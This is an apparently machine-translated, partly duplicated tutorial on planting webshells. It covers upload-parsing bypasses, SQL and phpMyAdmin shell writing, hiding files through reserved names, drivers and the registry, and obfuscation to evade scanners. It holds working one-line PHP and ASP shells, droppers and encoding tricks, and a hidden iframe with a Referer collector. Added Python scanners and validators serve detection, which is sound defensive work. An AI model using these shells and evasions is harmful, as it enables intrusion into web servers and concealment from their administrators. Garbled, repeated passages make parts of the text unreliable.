Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
When the web server runs PHP through fast-CGI, upload an image xx.jpg whose content is:

```php
<?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[shell])?>'); ?>
```

The fputs here creates a shell.php file and writes a one-sentence shell into it. Requesting the path xx.jpg/.php makes the image run as PHP and generates the one-sentence Trojan shell.php in that directory. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Language environments: PHP, Perl, Bourne Shell, C and other languages.
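As an added defensive example (not code from the post), the following Python upload check rejects the file names and contents used by the tricks in this section and the two that follow it (xx.jpg/.php path-info, %00 truncation, xx.php.rar, x.php;x, NTFS streams, and the reserved device names listed later in the hiding section) and flags path-info requests seen in access logs. All sample inputs are constructed.

```python
import re

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
# Windows reserved device names from the list later on this page (lpt9 completes the series)
RESERVED = ({"aux", "prn", "con", "nul"}
            | {f"com{i}" for i in range(1, 10)}
            | {f"lpt{i}" for i in range(1, 10)})
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Openers of server-side code; an image carrying one is a dropper like the xx.jpg above.
# (Raw pixel data can contain "<%" by chance; re-encoding the image is the stronger fix.)
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")
# NUL/control chars (%00 truncation), path separators, ':' (NTFS streams), ';' (x.php;x), '%'
FORBIDDEN = re.compile(r'[\x00-\x1f\x7f/\\:;%*?"<>|]')
# A request path that asks the script engine to run an image: /uploads/xx.jpg/.php
PATHINFO_ABUSE = re.compile(r"\.(?:jpe?g|png|gif)/[^/]*\.php", re.I)


class UploadRejected(ValueError):
    pass


def normalize_name(raw: str) -> str:
    """Return the name that will be stored, or raise UploadRejected.

    Rejects the tricks in the text: NUL/%00 truncation, '1.asp .jpg' padding,
    xx.php.rar double extensions, x.php;x, NTFS streams and reserved names.
    """
    if FORBIDDEN.search(raw):
        raise UploadRejected("forbidden character in file name")
    parts = [p.strip().lower() for p in raw.split(".")]
    if len(parts) != 2 or not all(parts):
        raise UploadRejected("name must be exactly stem.ext")
    stem, ext = parts
    if ext not in ALLOWED_IMAGE_EXT:
        raise UploadRejected(f"extension .{ext} not allowed")
    if stem in RESERVED:
        raise UploadRejected("reserved device name")
    return f"{stem}.{ext}"


def check_content(stored_name: str, data: bytes) -> None:
    """Require the declared image's magic bytes and no server-side script opener."""
    magic = MAGIC[stored_name.rsplit(".", 1)[1]]
    if not data.startswith(magic):
        raise UploadRejected("content does not match declared image type")
    low = data.lower()
    if any(marker in low for marker in SCRIPT_MARKERS):
        raise UploadRejected("script marker embedded in image")


def audit_upload(raw_name: str, data: bytes):
    """Run both checks; return (accepted, stored_name_or_reason)."""
    try:
        stored = normalize_name(raw_name)
        check_content(stored, data)
        return True, stored
    except UploadRejected as exc:
        return False, str(exc)


def is_pathinfo_abuse(request_path: str) -> bool:
    """True for URLs like /uploads/xx.jpg/.php. Pair the check with cgi.fix_pathinfo=0
    and an upload directory that is served without any script handler."""
    return bool(PATHINFO_ABUSE.search(request_path))


# Constructed inputs: a minimal JPEG header and the dropper body from this section.
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12
DROPPER = b"<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>');?>"

if __name__ == "__main__":
    for name, body in [("xx.jpg", JPEG), ("xx.jpg", JPEG + DROPPER), ("xx.php.rar", JPEG),
                       ("1.asp\x00.jpg", JPEG), ("1.asp .jpg", JPEG), ("x.php;x", JPEG),
                       ("aux.jpg", JPEG), ("img.jpg:shell.asp", JPEG)]:
        print(repr(name), audit_upload(name, body))
    print(is_pathinfo_abuse("/uploads/xx.jpg/.php"))
```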
(5) Apache parsing vulnerability

Apache parses extensions from right to left; if it cannot handle a suffix, it moves one suffix to the left. Upload handlers, however, usually only look at the rightmost suffix of the uploaded file. So the shell can be named xx.php.rar: Apache cannot parse rar, so it parses the file as php, while the upload check sees rar, and the suffix restriction is bypassed.

2. Truncate the upload
When uploading a picture, name it for example 1.asp .jpg (with a space after asp). Capture the upload form with NC or Burp Suite and replace the space after asp with %00 (in Burp Suite you can edit the HEX view directly: the HEX value of a space is 20, change 20 to 00). HEX 00 means truncation and 20 means a space; with the truncation in place the script's JPG check is ignored and the ASP file is uploaded directly.

3. Backend database backup
Some enterprise backend management systems have a database backup function (for example, Southern CMS). You can upload a picture that contains a one-sentence Trojan, or rename the shell to jpg, and then use the database backup function to back the picture up as asp or another extension that is parsed as script, after which the Trojan can be executed by accessing it through the web. This method is very old; most CMSs have now removed or disabled this backup function.

4. Use database statements to upload
(1) mysql database into outfile

The premise of this method is that the website has an injection point, that the current database user has file write permission, and that the absolute path of the web root on the server is known. The method is to use a union query to write the one-sentence Trojan into a PHP file under the website, and then connect to it with the client. However, these conditions are too harsh and are rarely met.

(2) Create a new table and write the Trojan

Some open source CMSs or self-made webshells have database management functions, including an SQL query function. First run create table shell (code text); to create a table named shell with a column named code of type text. Then run insert into shell(code) values('one sentence horse'); so that the code column holds the one-sentence shell. Then, through a custom backup, back the table up as x.php;x, which is parsed as php and executed. x.php;x is not guaranteed to be parsed as php: different web servers have different service programs and filtering rules, and other names may be needed.

(3) phpMyAdmin configuration error

phpMyAdmin is a tool for managing website databases; config.inc.php is its configuration file. If the $cfg['Servers'][$i]['auth_type'] parameter is not set (the default is config), no verification is done when logging in to the database and you can connect directly. In some versions of MySQL the default login is the root user (the administrator), so the login has maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as that user, create a table and write the one-sentence Trojan into it.

3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading a webshell you must hide it. The first purpose of hiding the webshell is to prevent the website administrator from discovering and deleting it; the second is to prevent other hackers from discovering and using the file.

(1) Hiding the Da Ma (big webshell)
①Undead zombie

Windows has reserved device names that it does not allow to be used as file or folder names: aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. Such files can nevertheless be created with the Windows copy command through the device path, for example:

```
c:\>copy 3.asp \\.\C:\aux.asp
```

This creates an aux.asp on the C drive. The file cannot be deleted from the graphical interface; it must be deleted with the del command. There is no prompt after deletion, but the file is indeed gone. Of course, although this creates a webshell that cannot be deleted through the graphical interface, if it is placed directly in the web root, an experienced administrator who sees it will still delete it.

②clsid hidden
Every program in Windows has a clsid. If you name a folder x.{program clsid} and then run two commands (shown only as screenshots in the original post), clicking the folder after creation opens the control panel, but in fact it is still a folder and the Da Ma still exists in it. Naming a folder with the clsid of a corresponding program can confuse administrators. For example, inside the recycle bin folder, create such a folder with the recycle bin's clsid and copy a reserved-name asp file into it. You can also use

```
attrib +h +s +r /s /d
```

to modify the file attributes and hide it. Windows does not display hidden files by default, and the recycle bin folder is created automatically, so an immortal webshell can be hidden on the server.
③Driver hiding technology

The principle: in the Windows file system, when a folder is opened the system sends an IRP_MJ_DIRECTORY_CONTROL request. Handling it allocates a buffer and traverses the entries of the folder, storing the results in the buffer. A hiding driver looks for matching file names during the traversal and, when one matches, skips that folder or file. From the code I looked at, my understanding is that when the target file is reached it adds the file's offset to the traversal pointer and moves on without listing the target. Although there are many C sources for this on the Internet, it is hard to get working because of header file and system support (the file systems of different Windows versions differ). I found the Easy File Locker program on the Internet; it needs to be installed on the web server and used to set permissions on the target file.
Permission settings include readable, writable, deletable, and visible.
The screenshots in the original post show that the file is now hidden. As mentioned above, because the traversal is bypassed, the file can still be accessed by its absolute path. My understanding is:
```
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
```

These four files replace the traversal query: when a hidden file is accessed by absolute path, the lookup does not go through the normal path query but through the four files above, which is equivalent to a separate driver for the hidden files.
In order not to be discovered by the administrator, you can uninstall the Easy File Locker program, but you cannot delete the four files above. After removing the program, the file can still be accessed by entering its absolute path, which achieves the hiding of the backdoor.

④Registry hiding

Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL. There is a CheckedValue key under this path; change it to 0. If there is no CheckedValue key, create one and assign it the value 0. Then hidden files will be completely hidden: even if "Show all files" is turned on under folder options, they will not be displayed.

(2) Hiding of one-sentence Trojans

①Header file inclusion hiding
Some script files on the web have include statements. You can use this inclusion to include the one-sentence file, and when the page is accessed the included sentence is called directly. The asp include statement is <!--#include file="path"-->; fill in the path directly, where the path is the path on the web server.
You can use the Webmaster Stop tool to write a one-sentence NTFS-stream shell into an image (the stream is addressed with ':' in the path); once it is written, the image will not be displayed. Then find an asp file on the web server and write an include statement at the beginning of the file. The php include statement is:
```php
<?php include($include); ?>
```
$include here can be an external path, such as:

http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php

The content of 1.php on aaa is

```php
<?php include($include); ?>
```

which means inclusion. bbb is an external server, provided that this server does not run PHP; otherwise hehe.php (that is, the one-sentence shell) would be executed on the bbb server and not on aaa.
②Configuration file hidden sentence (PHP)

After getting a PHP webshell, you can use php.ini to hide the file by editing the configuration. One of its functions adds the contents of a given file to every page as a header and footer: auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;": this setting tells where the header and footer files are loaded from. The path rule is "path1;path2", meaning the header and footer file in the path1 folder is added to the files under path2; here a '.' indicates the root path, which is equivalent to adding it to the homepage. Then write the one sentence in the hehe.php file, and through php's prepend function the sentence is written into the homepage of the website.

③404 Pony

A 404 Pony displays a "page does not exist" 404 page when accessed, but in fact the Trojan code has already been executed. Generally, it can be called out by pressing shift 5 times.

4. Evading detection with one-sentence webshells
1. Construction method to bypass detection (PHP)

General detection programs filter strings like "_POST", "system", "call_user_func_array"; sometimes you can use construction to bypass them. The basic principle is that each character in PHP corresponds to a binary value, so with XOR one character in the shell can be replaced by the XOR of two other characters. For example:

```php
<?php
@$_++;              // ++ on an undefined variable makes $_ equal to 1
$__ = ("#"^"|");    // '_'
$__ .= ("."^"~");   // 'P'
$__ .= ("/"^"`");   // 'O'
$__ .= ("|"^"/");   // 'S'
$__ .= ("{"^"/");   // 'T'
?>
```
Then the constructed one-sentence shell can be written as

```php
<?php
@$_++;
$__ = ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // the value of $__ is _POST
@${$__}[!$_](${$__}[$_]);   // the result is @$_POST[0]($_POST[1])
?>
```

!$_ is the negation of 1; in the language 1 is true, so its negation is 0 (false). But this bypass method is quite weak. If you think about it carefully, even though the characters are XOR-ed, the expression

```php
$__ = ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
```

has a binary value that is detected just the same; a scanner that checks the hexadecimal value of the code will still kill it.

2. Regular expression replacement method (PHP)

There is a function preg_replace() in php that performs regular expression replacement. Using replacement to bypass the detection system also relies on a feature of the PHP scripting language: when the function is called, if the value assigned to the formal parameter contains a command, the command is executed.
```php
<?php
function funfunc($str) {}
// the e modifier evaluates the replacement as PHP code; "\1" is the captured text
echo preg_replace("/(.+?)/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
```
The above code is a replacement process. First an empty function is created; then the preg_replace function, with the e modifier, replaces the matched content of the cmd form field with a call to funfunc. The value in the post form is written as

{${phpinfo()}}

(of course phpinfo() here can be replaced with other commands). Through the replacement it becomes funfunc({${phpinfo()}}), and since ${} evaluates the content in {}, the phpinfo here is executed.

3. Instant generation method (PHP)

When using header file inclusion, the included php file is easily found by a scanner. Instead, you can use file_put_contents to create a php file with the one sentence written into it, generating the shell just before accessing it. But this function is sensitive and can be easily killed.

4. Avoidance method (asp)
Because some asp servers filter in order to block the usual one-sentence shell, you can use:

```asp
<script language=VBScript runat=server>execute request("cmd")</script>
```

The function is the same; only the form changes. Avoiding the specific script language: aspx one sentence
```aspx
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script>
```
Here the one-sentence shell is written in C#.

5. Split method (asp)

Split the statement into parts. Although the chance of bypassing is small, it is still a bypass technique: some servers may have implemented many sophisticated scanning methods but miss small problems. There is also an enhanced version of the split method:
```asp
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
```
The two lines above use an if statement to separate it. The core idea is to split the sensitive characters: the usual asp signature is eval(request or execute(request, and after splitting the signature is not detected, so it is bypassed directly.

6. Garbled-text transformation (ANSI->Unicode encoding)
```asp
<%eval request("#")%>
```

transforms into "┼攠數畣整爠煥敵瑳∨∣┩愾"
```asp
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
```

The line above uses ASCII encoding: chr(114) represents the character numbered 114 in ASCII, i.e. r. After conversion the code is
```asp
<%eval(eval("request")("brute"))%>
```
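To show how a scanner can see through the constructions in sections 1 to 6 above, here is an added Python example (not code from the post): it folds the XOR-literal, chr() and ANSI-to-Unicode transformations back to plain text and then applies signatures that also catch the session-relay split. All samples are constructed to mirror the page's snippets.

```python
"""Static triage for the one-sentence webshell evasions above (added example)."""
import re

XOR_PAIR = re.compile(r'\(\s*"([^"\\])"\s*\^\s*"([^"\\])"\s*\)')   # ("#"^"|")
CONCAT = re.compile(r'"\s*\.\s*"')                                 # "_"."P" -> "_P"
CHR_RUN = re.compile(r'(?:chr\(\s*\d+\s*\)\s*[+&]?\s*)+', re.I)     # chr(114)+chr(101)...
CHR_ONE = re.compile(r'chr\(\s*(\d+)\s*\)', re.I)


def fold_php_xor(src: str) -> str:
    """Evaluate XOR-of-literal pairs and merge the concatenation, revealing "_POST"."""
    out = XOR_PAIR.sub(lambda m: '"%s"' % chr(ord(m[1]) ^ ord(m[2])), src)
    return CONCAT.sub("", out)


def fold_asp_chr(src: str) -> str:
    """Turn a chr() run into the string it builds, e.g. eval(eval("request")(...))."""
    return CHR_RUN.sub(lambda m: '"%s"' % "".join(chr(int(n)) for n in CHR_ONE.findall(m[0])), src)


def unfold_utf16(text: str):
    """Reverse the ANSI->Unicode trick: the shell's ASCII bytes were read two at a time
    as UTF-16LE code units, so re-encoding the glyphs gives the ASCII back (else None)."""
    if text.isascii():
        return None
    raw = text.encode("utf-16-le")
    return raw.decode("ascii") if all(32 <= b < 127 or b in (9, 10, 13) for b in raw) else None


def normalize(src: str) -> str:
    """Apply every reversal so the signatures see the plain form."""
    plain = unfold_utf16(src)
    return fold_asp_chr(fold_php_xor(plain if plain is not None else src))


SIGNATURES = [
    ("php-eval-post", re.compile(r'\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST)', re.I)),
    ("hidden-superglobal", re.compile(r'"_(POST|GET|REQUEST|COOKIE)"')),   # only visible after folding
    ("php-varvar-call", re.compile(r'\$\{\$\w+\}\s*\[[^\]]*\]\s*\(')),      # @${$__}[!$_](...)
    ("php-preg-replace-e", re.compile(r'preg_replace\s*\(\s*(["\'])/.*?/[a-z]*e[a-z]*\1', re.I | re.S)),
    ("php-writes-php-tag", re.compile(r'(file_put_contents|fputs|fwrite)\s*\([^;]*<\?(php|=)', re.I | re.S)),
    ("asp-exec-request", re.compile(r'\b(eval|execute)\s*\(?\s*request\s*\(', re.I)),
    ("asp-exec-session-relay", re.compile(
        r'session\s*\(\s*"(\w+)"\s*\)\s*=\s*request\b.*?\b(eval|execute)\s*\(?\s*session\s*\(\s*"\1"', re.I | re.S)),
    ("asp-exec-string", re.compile(r'\b(eval|execute)\s*\(\s*eval\s*\(\s*"request"', re.I)),
    ("aspx-webadmin", re.compile(r'WebAdmin2Y\.x\.y', re.I)),
]


def scan(src: str) -> list:
    """Sorted names of the signatures that fire on the normalized source."""
    text = normalize(src)
    return sorted(name for name, rx in SIGNATURES if rx.search(text))


# Constructed samples mirroring the snippets in this section (not real uploads).
SAMPLES = {
    "xor": '<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); ?>',
    "preg_e": r'''<?php function funfunc($str){} echo preg_replace("/<data>(.+?)<\/data>/ies", 'funfunc("\1")', $_POST["cmd"]); ?>''',
    "dropper": "<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>');?>",
    "asp_split": '<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>',
    "asp_chr": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>',
    # the ASCII shell re-read as UTF-16LE, the same trick behind the page's "┼攠數畣整..." string
    "mojibake": '<%execute request("#")%>'.encode("ascii").decode("utf-16-le"),
    "benign": '<?php echo htmlspecialchars($_POST["name"]); ?>',
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:10s} {scan(src)}")
```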
7. Da Ma anti-virus evasion

(1) base64 encoding

Da Ma evasion can be done by compressing the Da Ma code, base64-encoding the compressed result, and then adding at the end of the Da Ma

```php
<?php @eval(gzinflate(base64_decode($code))); ?>
```

to execute the script. Here the $code variable stores the base64 string. During execution it is first decompressed by gzinflate and then executed by eval. In fact this does not truly evade detection, since base64_decode and eval are still in the signature list and it will also be killed when passing through the scanner.

(2) ROT13 encoding (php)
str_rot13 is a php encoding function. It can be used to encode script code to bypass signature detection, as in the screenshot of the original post (not reproduced here). The strrev function in the picture reverses the characters; to escape signature detection the characters are deliberately separated with '.' signs. The three strings encoded by str_rot13 in the picture are gzinflate, str_rot13 and base64_decode in order, which amounts to triple encoding and also avoids the two signatures gzinflate and base64_decode. But str_rot13 itself is not avoided, and some anti-virus software may also use str_rot13 as a signature. ROT13 means rotation by 13: each character's position in the alphabet is shifted by 13. Applying it twice returns the original value. Because the algorithm is fixed, the encoding strength is weak, and decoding it is extremely simple: just apply it once more.

(3) Other encodings

Generally, anti-virus software and scanners use signatures to determine whether there is a virus. When evading detection for a Da Ma, a small shell, or a one-sentence shell, php or asp encoding functions (such as base64, rot13, etc.) are usually used to bypass scanners. But I think you can write your own encoding algorithm and then use it to encode the script code to bypass some signatures. You can borrow ideas from the Caesar cipher and shift ciphers, write an algorithm, and encode the script code; then signatures such as base64 and rot13 disappear. Or you can directly use the homemade algorithm to encode only the signature strings and decode them when used. You can also use keyed algorithms such as DES and RSA. Generally, a Da Ma has a password login box; you can tie the login password to the decryption key, so the code can be parsed only after the correct password is entered. On the one hand this avoids detection by scanners and anti-virus software, and on the other hand it is convenient: even if this Da Ma is obtained by others, they cannot decrypt it and see the source code.

5. About the backdoor of webshell
Generally, Da Ma downloaded online have more or less backdoors, which directly lead to the websites we obtain being taken over by others, so a Da Ma downloaded online must first be checked for backdoors. For example, the universal password here:

```asp
end function
if session("hehe")<>"" then
  if request.form("pass")=userpass or request.form("pass")="1111111" then
    session("hehe")=userpass
    response.redirect url
  else
```
Here

```asp
request.form("pass")=userpass
```

was originally used to verify the value of pass: if the entered pass equals userpass, verification succeeds. But the later

```asp
or request.form("pass")="1111111"
```

means that if the entered pass is 1111111 you can also log in to the Da Ma. Of course this place may not be that simple. The original author can assign userpass two values and add a trigger condition for changing userpass that fires on login (for example, a failed login triggers the update of the userpass value), so that a suffix is added; moreover the trigger code and the verification code are far apart and hard to find. In that case the Da Ma code has to be analyzed line by line.
Then use a frame to mount the horse:

```html
<iframe src="backdoor address" width=0 height=0></iframe>
```
Here the width and height of the frame are set to 0, so the page is hidden. The "backdoor address" points to your own receiving script, which you put on a public server you control. The receiving script is as follows:

```asp
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
```
where

```asp
url=Request.ServerVariables("HTTP_Referer")
```

reads the Referer of the request, that is, the URL of the Da Ma, and the URL is then saved to hehe.txt in the current directory.
To remove this kind of backdoor, you must first destroy the second password check in the Da Ma, that is, the master password: delete the relevant function code. Then check whether the ASP Da Ma page contains a hidden URL such as width=0 height=0, find it and delete it.
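As an added triage example (not code from the post), here is a Python script that peels the gzinflate/base64_decode/str_rot13/strrev layering from section 7 and flags the three section-5 backdoor indicators (the alternate hard-coded password, the zero-size iframe and the Referer collector) in constructed samples; the host collector.example is a placeholder.

```python
"""Triage for a downloaded Da Ma: peel the layered encodings of section 7 and
flag the built-in backdoors of section 5. Added example, not the page's code;
samples are constructed. Only the helpers the text names are understood."""
import base64
import codecs
import re
import zlib

HELPERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "gzuncompress": lambda s: zlib.decompress(s.encode("latin-1")).decode("latin-1"),
    "str_rot13": lambda s: codecs.decode(s, "rot_13"),
    "strrev": lambda s: s[::-1],
}
LITERAL = re.compile(r"(['\"])(.*)\1", re.S)
CALL = re.compile(r"@?\$?(\w+)\s*\((.*)\)\s*;?", re.S)   # name(...) or $var(...)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;=]+);")            # $x = strrev(str_rot13('...'));
EVAL_OPEN = re.compile(r"@?\beval\s*\(", re.I)


def evaluate(expr: str, names: dict):
    """Evaluate a chain of helpers over a quoted literal; None if anything is unknown."""
    expr = expr.strip()
    if m := LITERAL.fullmatch(expr):
        return m[2]
    m = CALL.fullmatch(expr)
    fn = names.get(m[1], m[1]) if m else None     # resolve $x to its assigned helper name
    if fn not in HELPERS:
        return None
    inner = evaluate(m[2], names)
    return None if inner is None else HELPERS[fn](inner)


def resolve_names(src: str) -> dict:
    """$var assignments whose value decodes to a helper name (the str_rot13/strrev trick)."""
    names = {}
    for m in ASSIGN.finditer(src):
        value = evaluate(m[2], names)
        if value in HELPERS:
            names[m[1]] = value
    return names


def eval_span(src: str):
    """(start, arg_start, arg_end, end) of the first eval(...) with balanced parentheses."""
    m = EVAL_OPEN.search(src)
    if not m:
        return None
    depth, i, quote = 1, m.end(), None
    while i < len(src) and depth:
        c = src[i]
        if quote:
            if c == "\\":
                i += 1                        # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        else:
            depth += (c == "(") - (c == ")")
        i += 1
    if depth:
        return None
    return m.start(), m.end(), i - 1, i + (src[i:i + 1] == ";")


def peel(src: str, max_depth: int = 8) -> str:
    """Replace eval(<decodable chain>) with the code it would run, repeating for nested layers."""
    for _ in range(max_depth):
        span = eval_span(src)
        if not span:
            break
        start, arg_start, arg_end, end = span
        code = evaluate(src[arg_start:arg_end], resolve_names(src))
        if code is None:
            break
        src = src[:start] + code + src[end:]
    return src


BACKDOOR_CHECKS = [
    ("alternate-password", re.compile(r'\bor\s+request\.form\s*\(\s*"pass"\s*\)\s*=\s*"[^"]+"', re.I)),
    ("hidden-iframe", re.compile(r'<iframe[^>]*\bwidth\s*=\s*"?0\b[^>]*\bheight\s*=\s*"?0\b', re.I)),
    ("referer-collector", re.compile(r'ServerVariables\s*\(\s*"HTTP_REFERER"\s*\)', re.I)),
]


def find_backdoors(src: str) -> list:
    """Names of the section-5 indicators present in the source."""
    return sorted(name for name, rx in BACKDOOR_CHECKS if rx.search(src))


INNER = '$title = "constructed Da Ma body"; @eval($_POST["cmd"]);'   # stand-in shell body


def make_sample() -> str:
    """Wrap INNER as section 7 describes: gzinflate(base64_decode()) with the names rot13/strrev-hidden."""
    b64 = base64.b64encode(zlib.compress(INNER.encode())[2:-4]).decode()   # raw DEFLATE
    return ("<?php\n$x = strrev(str_rot13('rgnysavmt'));\n"   # -> gzinflate
            "$y = str_rot13('onfr64_qrpbqr');\n"               # -> base64_decode
            f"@eval($x($y('{b64}')));\n?>")


ASP_DAMA = '''<%
if session("hehe")<>"" then
  if request.form("pass")=userpass or request.form("pass")="1111111" then
    session("hehe")=userpass : response.redirect url
  end if
end if
%>
<iframe src="http://collector.example/r.asp" width=0 height=0></iframe>'''   # placeholder host

if __name__ == "__main__":
    print(peel(make_sample()))
    print(find_backdoors(ASP_DAMA))
```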
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
2. Truncate the upload
3. Backend database backup
4. Use database statements to upload
(1) mysql database into outfile
(2) Writing the Trojan through a new table
Some open-source CMSs and self-made webshells have database management functions, and those include an SQL query function. First run create table shell (code text); which creates a table named shell with a single column named code of type text. Then run insert into shell(code) values('<one-line Trojan>'); which stores the one-line Trojan in the code column of the shell table. Finally, use the custom backup function to back the table up as x.php;x, which is then parsed as PHP and executed. x.php;x is not guaranteed to be parsed as PHP: different web servers run different service programs with different filtering rules, so another name may be needed.
(3) phpMyAdmin misconfiguration
phpMyAdmin is a tool for managing website databases, and config.inc.php is its configuration file. When viewing that file, if the parameter $cfg['Servers'][$i]['auth_type'] is not set (the default is config), no corresponding authentication is performed when logging in to the database and you can connect to it directly. In some MySQL versions the default login is the root user (the administrator), so the session has maximum privileges. However, root can generally only log in locally, so a remote login user must be created; after logging in as that remote user, create a table and write the one-line Trojan into it.
3. The "security" of webshell
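Two defender-side checks for the database-based upload paths above, as an added example that is not part of the original article: an audit of a phpMyAdmin config.inc.php for server blocks whose auth_type is missing or config, and a filter over SQL statements for INTO OUTFILE and script open tags in string literals. The config excerpt and the query-log lines are constructed samples; the host names in them are placeholders.

```python
# Added example (not part of the original article): two defender-side checks for
# the database upload paths described above. Inputs are constructed samples.
import re

# Constructed excerpt of a phpMyAdmin config.inc.php with two server blocks.
SAMPLE_CONFIG = """
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$i++;
$cfg['Servers'][$i]['host'] = 'db2.internal';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
"""

SETTING = re.compile(r"\$cfg\['Servers'\]\[\$i\]\['(\w+)'\]\s*=\s*'([^']*)';")

def parse_servers(text):
    """Group $cfg['Servers'][$i][...] lines by server block (each $i++ starts one)."""
    servers, block = {}, 0
    for line in text.splitlines():
        line = line.strip()
        if line == "$i++;":
            block += 1
            continue
        m = SETTING.match(line)
        if m:
            servers.setdefault(block, {})[m.group(1)] = m.group(2)
    return servers

def audit_phpmyadmin_config(text):
    """Flag server blocks where auth_type is absent or 'config' (the article: config is the default)."""
    findings = []
    for idx, s in sorted(parse_servers(text).items()):
        if s.get("auth_type", "config") == "config":
            pw = "empty" if s.get("password", "") == "" else "set"
            findings.append(f"server {idx}: auth_type=config, user='{s.get('user', '')}', password {pw}")
    return findings

# Patterns for the SQL-based upload methods: INTO OUTFILE and script tags in literals.
SUSPICIOUS_SQL = [
    (re.compile(r"\binto\s+(out|dump)file\b", re.I), "INTO OUTFILE/DUMPFILE writes a file on the database host"),
    (re.compile(r"<\?(php|=)?|<%", re.I), "script open tag inside SQL text"),
]

def flag_suspicious_sql(statements):
    """Return (statement, reason) for each statement matching an upload pattern."""
    hits = []
    for stmt in statements:
        for rx, reason in SUSPICIOUS_SQL:
            if rx.search(stmt):
                hits.append((stmt, reason))
                break
    return hits

SAMPLE_SQL = [  # constructed query-log lines
    "select id, name from users where id = 7",
    "create table shell (code text)",
    "insert into shell(code) values('<?php phpinfo(); ?>')",
    "select '<?php phpinfo(); ?>' into outfile '/var/www/html/x.php'",
]

if __name__ == "__main__":
    for f in audit_phpmyadmin_config(SAMPLE_CONFIG):
        print("config:", f)
    for stmt, reason in flag_suspicious_sql(SAMPLE_SQL):
        print("sql:", reason, "::", stmt)
```

The create table statement on its own is not flagged; what marks the technique is the script tag inside the inserted value and the file write, so those are the two signals a query log review should key on.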
1. Regarding the hiding of webshell
When uploading a webshell you must hide it. The first purpose of hiding is to prevent the website administrator from discovering and deleting it; the second is to prevent other hackers from discovering the file and using it.
(1) Hiding the Da Ma (big Trojan)
① Undead zombies
Windows has system-reserved names that it does not allow to be used for folders: aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But such names can be created with the Windows copy command, for example:
```
c:\>copy 3.asp \\.\C:\aux.asp
```
This creates an aux.asp on the C drive. The file cannot be deleted from the graphical interface; to delete it you must use the del command. There is no prompt after deletion, but the file is indeed gone. Although this method produces a webshell that cannot be deleted through the graphical interface, if it is placed directly in the web root it will still be deleted once an experienced administrator sees it.
② CLSID hiding
